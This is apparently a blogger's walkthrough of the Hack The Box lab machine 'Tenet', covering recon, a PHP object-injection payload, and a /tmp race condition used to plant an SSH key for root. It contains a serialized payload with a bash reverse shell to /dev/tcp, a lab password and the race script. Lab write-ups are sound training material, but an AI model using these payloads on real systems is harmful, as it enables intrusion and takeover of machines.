# Tenet ~ Hack The Box

* * *

### Prerequisite

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985504128/c553fa82-46be-4df8-a5c8-515e88472428.jpeg)

Just to make life easier I usually add an entry in my hosts file for easier access of the target machine.

    echo "10.10.10.223	tenet.htb" >> /etc/hosts

hosts file entry

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985505316/dc375918-5047-43b3-bb82-0a1752bf36c7.png)

Okay now onto the hacking!

* * *

### Reconnaissance

As always, I started off with an NMAP scan against the machine.

     nmap -Pn -sC -sV -oN initial tenet.htb

    Nmap scan report for tenet.htb (10.10.10.223)
    Host is up (0.0044s latency).
    Not shown: 998 closed ports
    PORT   STATE SERVICE VERSION
    22/tcp open  ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
    | ssh-hostkey: 
    |   2048 cc:ca:43:d4:4c:e7:4e:bf:26:f4:27:ea:b8:75:a8:f8 (RSA)
    |   256 85:f3:ac:ba:1a:6a:03:59:e2:7e:86:47:e7:3e:3c:00 (ECDSA)
    |_  256 e7:e9:9a:dd:c3:4a:2f:7a:e1:e0:5d:a2:b0:ca:44:a8 (ED25519)
    80/tcp open  http    Apache httpd 2.4.29 ((Ubuntu))
    |_http-generator: WordPress 5.6
    |_http-server-header: Apache/2.4.29 (Ubuntu)
    |_http-title: Tenet
    Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

### Scanning & Enumeration

Based on the scan that was run, I realized that port 80 was running a web server. This was the web app that was being served!

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985506546/0357b531-8d91-426c-8645-435ed9217e62.png)

Just another default Apache2 web page.

However, I recalled the `NMAP` scan showing a wordpress 5.6 banner. Thus, I tried accessing the site using its hostname.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985507751/bd37e876-12a5-42c4-a7af-a70c9c805385.png)

As expected, there was a WordPress blog. Upon taking a closer look, I found a post on that blog with the following contents.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985508884/5c362494-6c44-4b6f-9198-aa772768409b.png)

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985510112/fe942bfd-4ea6-49fd-bc33-5f9f4cba79fc.png)

I tried to access this `php` file in question but was unable to do so.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985511126/b4ceecc1-c994-4563-ae90-0aa359937a66.png)

So I decided to use the IP instead of the domain/host name.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985512187/b3595845-1a6a-4a3b-9732-1013628ed5f5.png)

To my surprise, I was able to trigger the file. Looking back at the comment, I realized that a backup of this file was mentioned. Thus, I decided to fuzz the url for the backup file with a wordlist and the tool named `WFUZZ`.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985513143/29711b21-274d-4fcd-9b32-5f6e98269b99.png)

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985514254/e515f1d0-cdd9-463f-a934-fddfc8236fbb.png)

I realized that the extension `.bak` had a difference in the response. So I went to check it out and it was indeed the backup file mentioned in the comments section.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985515482/a8e7db1c-481c-43c7-9a89-94ecee571062.png)

    <?php
    
    class DatabaseExport
    {
            public $user_file = 'users.txt';
            public $data = '';
    
            public function update_db()
            {
                    echo '[+] Grabbing users from text file <br>';
                    $this-> data = 'Success';
            }
    
    
            public function __destruct()
            {
                    file_put_contents(__DIR__ . '/' . $this ->user_file, $this->data);
                    echo '[] Database updated <br>';
            //      echo 'Gotta get this working properly...';
            }
    }
    
    $input = $_GET['arepo'] ?? '';
    $databaseupdate = unserialize($input);
    
    $app = new DatabaseExport;
    $app -> update_db();
    
    
    ?>
    

This was the backup file. After analyzing it, I realized that it was vulnerable to PHP Object Injection. [Here's](https://www.exploit-db.com/docs/english/44756-deserialization-vulnerability.pdf) the document that I used to understand this vulnerability \[Page 30 onwards\].

### Exploitation

I knew that the file took in a parameter called `arepo`. The goal was to serialize a payload which input's a file on the target machine and run arbitrary commands. Here's the payload that I came up with based on the document mentioned above.

    class DatabaseExport
    {
            public $user_file = 'exploittenet.php';
            public $data = '<?php echo exec("whoami");?>';
    }
    echo serialize(new DatabaseExport);

Next, I ran PHP in interactive mode and fed this script which output the serialized version.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985516699/15012d3b-d7f5-4e08-b0cf-beb80144bed3.png)

    O:14:"DatabaseExport":2:{s:9:"user_file";s:16:"exploittenet.php";s:4:"data";s:28:"<?php echo exec("whoami");?>";}
    

I then took this output and URLencoded it with the help of cyberchef.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985517728/7016a664-e26c-4a37-9fb1-f115aff916ad.png)

Lastly, I fed the parameter with the output value from cyberchef and tested if this POC would work.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985518779/f3411e18-f60c-41a1-9c08-02f2de4e0337.png)

And that worked! I next constructed a similar payload for a reverse shell based on the POC and opened up a netcat listener to catch the incoming shell.

    class DatabaseExport
    {
            public $user_file = 'neeshell.php';
            public $data = '<?php exec("/bin/bash -c \'bash -i > /dev/tcp/10.10.14.51/666 0>&1\'"); ?>';
    }
    echo serialize(new DatabaseExport);

Exploit code for reverse shell

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985519949/0e395fca-88a7-4321-aa8d-60afe7267736.png)

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985520934/03fa2774-f12b-4356-b191-465f06444ef7.png)

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985521912/9449a083-7a97-438d-896c-5bc811d244e3.png)

And I now had a steady reverse shell connection from the target box!

### Lateral Movement

Enumerating around the box for awhile led to me discovering the `wordpress` directory which was located in the html directory.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985523144/76161bce-b37a-4a89-8222-0ef56eba8bfd.png)

Looking further, I found a file named `wp-config.php`. In there was the credentials belonging to the user `neil`.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985524222/252b3688-6a63-4576-a0f6-49972eee289a.png)

    neil:Opera2112

Since SSH was running on the box, I was able to easily login to `neil`'s account and grab the user.txt flag.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985525332/78e22994-3789-4413-9378-37d70dbc265e.png)

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985526478/c00c1297-c8bf-4656-8302-c93dd58e8c14.png)

### Privilege Escalation

This last part required some custom bash scripting to overcome. Running `sudo -l` revealed that the `neil` user was allowed to run a bash script named `enableSSH.sh`.

    #!/bin/bash
    
    checkAdded() {
            sshName=$(/bin/echo $key | /usr/bin/cut -d " " -f 3)
            if [[ ! -z $(/bin/grep $sshName /root/.ssh/authorized_keys) ]]; then
                    /bin/echo "Successfully added $sshName to authorized_keys file!"
            else
                    /bin/echo "Error in adding $sshName to authorized_keys file!"
            fi
    }
    
    checkFile() {
            if [[ ! -s $1 ]] || [[ ! -f $1 ]]; then
                    /bin/echo "Error in creating key file!"
                    if [[ -f $1 ]]; then /bin/rm $1; fi
                    exit 1
            fi
    }
    addKey() {
            tmpName=$(mktemp -u /tmp/ssh-XXXXXXXX)
            (umask 110; touch $tmpName)
            /bin/echo $key >>$tmpName
            checkFile $tmpName
            /bin/cat $tmpName >>/root/.ssh/authorized_keys
            /bin/rm $tmpName
    }
    key="ssh-rsa AAAAA****TNN/w0p+Urjbl root@ubuntu"
    addKey
    checkAdded

This script adds a key into the `authorized_keys` file to enable ssh to and from a particular machine. However, there's a small loop hole in the script. The public key of the endpoint is first written into a temporary file in `/tmp` before being written to the actual `~/.shh` folder in root. If I were to overwrite all files in `/tmp` continuously with my machine's public key, I would gain root access.

    #!/bin/bash
    date
    cd /tmp
    while true;
            do echo 'ssh-rsa AAAAB3Nz*****B8aLDra2Zg2CGmhH2flRKU=' | tee ssh-*
    done

Next, I ran this script and the `enableSSH.sh` script a couple times.

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985527473/f2607bb7-b452-4a6d-911d-ea80d06a7014.png)

Followed by that, I tried to SSH into the root account from my machine and was successful!

![Tenet ~ Hack The Box](https://cdn.hashnode.com/res/hashnode/image/upload/v1680985528574/6bfd3684-7c5c-467b-9385-fdf66be770a9.png)

ROOTY!
